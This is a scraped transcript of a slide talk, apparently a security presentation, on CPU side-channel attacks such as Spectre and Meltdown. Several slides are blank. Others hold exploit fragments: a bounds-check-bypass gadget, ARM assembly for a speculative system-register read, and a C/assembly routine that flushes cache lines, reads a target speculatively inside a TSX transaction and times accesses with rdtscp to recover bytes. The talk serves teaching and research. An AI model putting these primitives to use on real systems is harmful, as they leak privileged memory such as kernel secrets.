

/Сергей Смитиенко/.



Presentation on theme: "/Сергей Смитиенко/."— Presentation transcript:

1 /Сергей Смитиенко/

2

3

4

5

6

7

8

9

10 Shadow Walker (2005); MoRE Shadow Walker: TLB-splitting on Modern x86

11

12 Hello From the Other Side SSH Over Robust Cache Covert Channels in the Cloud - 2013

13 ARMageddon: How Your Smartphone CPU Breaks Software-Level Security and Privacy - 2016

14

15 https://en.wikichip.org/wiki/intel/microarchitectures/skylake_(client)

16 mov rax, 1 add rax, 1 mov [1], rax mov rax, 2 add rax, 2 mov [2],rax

17 if (x < array1_size) y = array2[array1[x] * 256];

18 jmp eax jmp [eax] jmp dword ptr [0x01dec0de] ret

19

20 https://github.com/lgeek/spec_poc_arm/
// void spec_read(void *probe_buf, void *miss_buf, int bit); .global spec_read .func spec_read: LDR X1, [X1] NOP // replaced with MRS X3, SYSTEM_REG LSR X3, X3, X2 AND X3, X3, #1 ADD X0, X0, X3, LSL #12 LDR X0, [X0] RET .endfunc

21 $ ./dump_sys_regs ACTLR_EL1 : 0x0 ACTLR_EL2 : 0x73 ...
TTBR0_EL : 0xf89f0000d TTBR0_EL : 0x0 TTBR0_EL : 0x30010b00 TTBR1_EL : 0x8133f000 TTBR1_EL : 0x0 VDISR_EL : 0x0 VSESR_EL : 0x0 VTCR_EL : 0x VTTBR_EL : 0x0 AFSR0_EL : 0x0 AFSR1_EL : 0x0 AMAIR_EL : 0x0 CNTFRQ_EL : 0x1dcd650 CNTHCTL_EL : 0x3 CNTHP_CTL_EL : 0x0 CNTHP_CVAL_EL : 0x0 CNTHP_TVAL_EL : 0x65a29ee7 (dynamic?) CNTHV_CTL_EL : 0x0 CNTHV_CVAL_EL : 0x0 CNTHV_TVAL_EL : 0x0 CNTKCTL_EL : 0xc6 CNTKCTL_EL : 0x0 ...

22

23 asm_test_sig(unsigned char* target) { register int mix_i,i,j;
register unsigned x; unsigned hit[256]; unsigned long time_read; unsigned junk; i = pread(fd, buf, sizeof(buf), 0); for (i = 0; i < 256; i++) hit[i] = 0; j = 100; do { for (i = 0; i < 256; i++) _mm_clflush( & test_arr[i*PSIZE] ); _asm_spec_read(target, test_arr); for (i = 0; i < 256; i++) { mix_i = ((i * 167) + 13) & 255; x = mix_i * PSIZE; time_read = _asm_time_read(&test_arr[x]); if (time_read < 100) { hit[mix_i] ++; } j--; } while (j > 0); ... ; rdi : base pointer _asm_time_read: push rbx xor rbx, rbx rdtscp ; edx = hi, eax = lo, ecx = junk mov ebx, edx shl rbx, 32 mov ebx, eax ; rbx = timestamp counter mov eax, [rdi] rdtscp shl rdx, 32 xor edx, edx or rax, rdx ; rax = timestamp counter sub rax, rbx pop rbx ret ; rsi : test_arr _asm_spec_read: xor rax, rax xor rcx, rcx xbegin ABORT_SPEC_READ spec_retry: %rep add rax, 0x141 %endrep jz spec_retry movzx eax, byte [rdi] shl eax, 12 movzx ebx, byte [rsi + rax + 1] xend ABORT_SPEC_READ:

24

25 Intel® 64 and IA-32 Architectures Software Developer’s Manual
Intel® 64 and IA-32 Architectures Software Developer’s Manual Intel® 64 and IA-32 Architectures Optimization Reference Manual Clémentine Maurice Arm Processor Security Update Meltdown Proof-of-Concept Spectre & Meltdown Checker Meltdown & Spectre PoC for OpenBSD ARM Meltdown PoC - This presentation.

26 skype: sergey.smitienko, FB, LinkedIn




